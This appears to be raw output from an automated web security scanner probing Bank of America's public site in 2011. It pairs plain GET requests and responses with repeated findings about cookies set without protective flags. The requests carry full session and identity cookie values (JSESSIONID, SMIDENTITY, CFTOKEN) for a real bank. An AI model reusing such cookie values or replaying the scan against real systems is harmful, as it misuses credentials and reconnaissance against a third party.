GET /deposits/checksave/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:36 GMT Content-type: magnus-internal/cold-fusion Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/deposits/checksave/index.cfm?template=overview&context=en_US&ch_bag=&sa_bag=&cd_bag= Connection: close Set-Cookie: BIGipServerngen-www.80=430356139.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /feesandprocesses/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=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; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:05:58 GMT Content-type: magnus-internal/cold-fusion Location: http://feesandprocesses.bankofamerica.com/ Connection: close Set-Cookie: BIGipServerngen-www.80=969324203.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /financialtools/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=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; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:05:59 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Location: http://learn.bankofamerica.com Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=482784939.20480.0000; path=/
<!-- i2a business unit tracking code --> <script LANGUAGE="JavaScript"> var ic_bu = "financialtools"; </script> <!-- i2a business unit tracking code -->
<!-- i2a general tracking code --> <sc ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:05:20 GMT Content-type: text/html P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: BIGipServerngen-www.80=2756032171.20480.0000; path=/ Content-Length: 19150
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Description" content="Plea ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /findit/locator.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=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; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:05:55 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Location: http://locators.bankofamerica.com/locator/locator Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=1455863467.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /help/equalhousing.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=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; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:05:17 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=1657190059.20480.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /help/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=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; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:05:16 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; expires=Wed, 03-Aug-2011 00:00:00 GMT; path=/; domain=.bankofamerica.com; Set-Cookie: SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN; path=/; domain=.bankofamerica.com; Connection: close Set-Cookie: BIGipServerngen-www.80=3049633451.20480.0000; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 404 Not found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:35:46 GMT Content-type: text/html P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: BIGipServerngen-www.80=3158750891.20480.0000; path=/ Content-Length: 19150
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Description" content="Plea ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /insurance/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=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; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:05:57 GMT Content-type: magnus-internal/cold-fusion Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/insurance/index.cfm?template=overview Connection: close Set-Cookie: BIGipServerngen-www.80=3267802795.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /loansandhomes/financial-difficulty/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:07 GMT Content-type: magnus-internal/cold-fusion Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/loansandhomes/financial-difficulty/index.cfm?adlink=&cm_mmc=&cm_sp=&type= Connection: close Set-Cookie: BIGipServerngen-www.80=732280491.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /loansandhomes/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=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; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:05:52 GMT Content-type: magnus-internal/cold-fusion Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/loansandhomes/index.cfm?template=overview Connection: close Set-Cookie: BIGipServerngen-www.80=1606858411.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /onlinebanking HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=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; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:05:58 GMT Content-length: 0 Content-type: text/html Location: http://www.bankofamerica.com/onlinebanking/ Connection: close Set-Cookie: BIGipServerngen-www.80=1757853355.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /onlinebanking/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:24 GMT Content-type: magnus-internal/cold-fusion Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/onlinebanking/index.cfm?adlink=&cm_mmc=&cm_sp=&context=en_US&locale= Connection: close Set-Cookie: BIGipServerngen-www.80=3014047403.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /onlinebanking/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:23 GMT Content-type: magnus-internal/cold-fusion Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/onlinebanking/index.cfm?adlink=&cm_mmc=&cm_sp=&context=en_US&locale= Connection: close Set-Cookie: BIGipServerngen-www.80=3047536299.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /onlinebanking/infocenter/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=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; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:05:22 GMT Content-type: magnus-internal/cold-fusion Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/onlinebanking/index.cfm?adlink=&cm_mmc=&cm_sp=&context=en_US&locale= Connection: close Set-Cookie: BIGipServerngen-www.80=2714089131.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:38 GMT Content-length: 1737 Content-type: application/x-javascript Last-modified: Sat, 28 Jun 2008 02:25:22 GMT Etag: "6c9-4865a112" Accept-ranges: bytes Set-Cookie: BIGipServerngen-www.80=910603947.20480.0000; path=/
/* OnlineOpinion (F3cS v3.1, en-US) */ /* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */ if((typeof _b ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:15:11 GMT Content-length: 6886 Content-type: application/x-javascript Last-modified: Sat, 28 Jun 2008 10:20:56 GMT Etag: "1ae6-48661088" Accept-ranges: bytes Set-Cookie: BIGipServerngen-www.80=1707521707.20480.0000; path=/
/* OnlineOpinion (F3cS v3.1) */ /* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */ var custom_var,O_tmof ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pap/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:01 GMT Content-type: magnus-internal/cold-fusion Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/pap/index.cfm?template=overview Connection: close Set-Cookie: BIGipServerngen-www.80=430290603.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pap/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:59 GMT Content-type: magnus-internal/cold-fusion Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/pap/index.cfm?template=overview Connection: close Set-Cookie: BIGipServerngen-www.80=3970283179.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:06:00 GMT Content-type: magnus-internal/cold-fusion Location: https://www.bankofamerica.com/privacy/Control.do?body=overview Connection: close Set-Cookie: BIGipServerngen-www.80=3267737259.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /search/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=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; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:06:01 GMT Content-type: magnus-internal/cold-fusion Location: /state.cgi?section=generic&url=search/&question_box=&ui_mode=question Connection: close Set-Cookie: BIGipServerngen-www.80=818329259.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /signin/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 301 Moved permanently Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:05:56 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Location: https://www4.bankofamerica.com/hub/index.action?template=signin Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=3167139499.20480.0000; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
